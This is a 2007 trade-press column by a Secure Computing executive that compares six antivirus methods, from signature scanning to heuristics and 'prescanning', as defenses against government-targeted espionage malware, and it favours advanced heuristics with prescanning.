Henry: Protect your valuables
For fighting Internet-based government espionage, traditional malware defenses aren’t nearly enough
- By Paul A. Henry
- Jul 30, 2007
A major threat plaguing government networks around the world today is Internet espionage — using the Internet for gaining access to classified government information through targeted attacks. Those attacks often combine previously unidentified malware with social engineering tactics. Recent public disclosure of the details of one such attack identified malware in an e-mail attachment as the entry point to a State Department network. The increase in such attacks on government agencies raises serious concerns about the effectiveness of traditional malware defenses.
Historically, antivirus products have been the first line of defense in combating malware attacks on government networks. Unfortunately, the majority of antivirus solutions are reactive in nature and offer little, if any, capability of detecting a new piece of malware.
There are at least six antivirus solutions.1: Signature
Signature-based antivirus is probably the oldest method of stopping virus-laden traffic. It is an exact science and produces definitive results. Either a virus matches the known signature, or it doesn’t. One of the advantages of this approach is speed. It doesn’t take many CPU cycles to compare malicious code with known signatures. Although this is a somewhat dated technology, it is regaining popularity as some security product vendors add antivirus capabilities to their all-in-one security solutions and try to minimize the performance impact of that added capability.
A further consideration is that, although the signature-based antivirus method offers good protection from known threats, it is not effective against unknown variants of known threats and offers no protection from new, previously unidentified threats. That weakness renders signature-based antivirus methods fully dependent on a vendor’s ability to react quickly and implement signatures for new threats before they can infect their customers — a feat that is impossible.2: Advanced signature
By focusing on a smaller segment of malicious code and thus reducing the signature size of a known vulnerability, antivirus vendors have been able to improve on traditional methods of protecting against variants of known threats. However, this methodology focuses only on a probability of a threat and is prone to false positives. It also suffers from the same inability to protect against new, unknown threats.
To reduce the window of opportunity, a clever approach in both traditional signature and advanced signature-based antivirus measures is connecting multiple antivirus products in a series. The potentially infected code is inspected by using each vendor’s solution sequentially. If any of the vendors finds a match for its respective signatures, the code is flagged as malicious. By spreading the inspection across multiple vendors, this methodology reduces the risk associated with dependence on a single vendor that may or may not have an acceptable response time for a particular threat. 3: Sandboxing
Rather than relying upon signatures, “sandboxing” provides a mechanism for running the potentially malicious code in an isolated environment in some form of a virtual machine. Sandboxing is more effective than signature-based antivirus methods, but it can still be fooled by a smart malicious code programmer who does a sufficient job of hiding the code’s malicious intent (such as by encrypting portions of the program that contain the malicious actions within the code’s data section and only later decrypting the malicious code and applying it against the host).4: Passive heuristics
A passive heuristic antivirus methodology, which applies experience-derived knowledge, is similar to an advanced signature-based antivirus approach. In this scenario, the vendor establishes a library of code segments that have a high probability of being malicious and searches through the potentially malicious code for the respective code segments. If the subject is found in the code, it is considered malicious and appropriate action is taken.
Although it is faster than sandboxing, and perhaps more effective than traditional signature-based antivirus methods, a passive heuristic-based antivirus method can be easily fooled by a knowledgeable malicious code programmer using encryption, run-time packagers or polymorphism. When used as the exclusive protective mechanism, a passive heuristics-based approach can produce high false-positive rates.5: Advanced heuristics
Advanced heuristics antivirus methodologies can vary dramatically by vendor, but share in part some common functionality. This approach normally involves a combination of methods, including signature-based antivirus, advanced signature-based antivirus, and perhaps a modified version of traditional sandboxing methods in running specific portions of the potentially malicious code. Combining traditional reasoning of signatures to protect from known attacks along with the theoretical reasoning of sandboxing to protect against new attacks affords maximum risk mitigation from current and future threats.
This methodology can provide better protection from both known and unknown code. It also offers a more acceptable false positive rate. From a performance standpoint, it is slower than a traditional signature approach, but it can provide better performance than a traditional sandbox approach. As with any approach, the advanced heuristic antivirus methodology requires regular updates to stay ahead of evolving threats.6: Prescanning
Another novel approach is a combination of methodologies called “prescanning,” which builds on the development of sandboxing and uses a three-pronged approach that verifies digital signatures. Prescanning blocks untrusted program code, screens and blocks any suspicious code based on its potential behavior and filters any potentially harmful code that tries to exploit vulnerabilities on the client. Prescanning involves multiple actions to provide protection, including:
- Examining any ActiveX controls and Java applets for digital signatures and verifying that the data was signed by an authority and has not been altered since the signature was applied.
- Performing heuristic analysis, looking for certain instructions or commands in a program that are not found in typical application programs. Potential function calls are examined regardless of the actual program flow, and potentially malicious functions are classified based on a given set of rules. To enhance performance, digital signatures are linked to a library of previously examined safe Active X controls for comparison to avoid unnecessary examination of previously examined Active X code.
- Scanning and filtering out any remaining suspects, such as scripts that try to exploit vulnerabilities of the client. The scripts themselves may not be malicious, but they are potential enablers to inject or execute further malicious code. Detecting and filtering such scripts interrupts any malicious payload being distributed to the clients.
Cyberspies that target Defense Department data to gain an advantage in future conflicts are using targeted malware to penetrate government networks. Clearly, espionage has found its way to the Internet, and it has been reflected in headline-grabbing attacks against both unclassified and classified government networks worldwide. Our experience has shown that using advanced heuristics-based, antivirus methods combined with prescanning as a direct replacement or as a complement to existing traditional antivirus defenses can provide the necessary risk mitigation to counter these threats. Henry is vice president of technology evangelism for Secure Computing.